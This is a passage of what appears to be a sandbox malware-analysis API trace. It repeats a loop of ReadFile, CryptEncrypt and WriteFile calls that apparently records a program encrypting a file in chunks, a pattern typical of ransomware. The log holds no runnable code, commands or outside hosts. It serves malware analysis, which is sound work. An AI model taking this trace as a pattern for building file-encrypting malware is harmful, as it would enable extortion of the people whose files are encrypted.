lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.823] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.823] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.823] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.823] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.823] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.823] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.823] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.823] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.823] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.823] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.823] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.823] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.824] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.824] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.824] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.824] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.824] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.824] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.824] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.824] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.824] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.824] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.824] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.824] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.824] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.825] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.825] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.825] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.825] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.825] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.825] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.825] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.825] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.825] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.825] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.825] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.825] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.825] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.825] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.826] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.826] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.826] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.826] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.826] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.826] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.826] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.826] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.826] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.826] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.826] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.826] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.826] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.827] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.827] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.827] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.827] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.827] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.827] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.827] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.827] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.827] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.827] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.827] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.827] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.828] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.828] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.828] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.828] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.828] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.828] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.828] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.828] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.828] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.829] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.829] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.829] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.829] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.829] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.829] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.829] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.829] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.829] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.829] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.829] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.829] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.829] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.830] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.830] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.830] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.830] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.830] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.830] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.830] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.830] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.830] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.830] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.830] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, 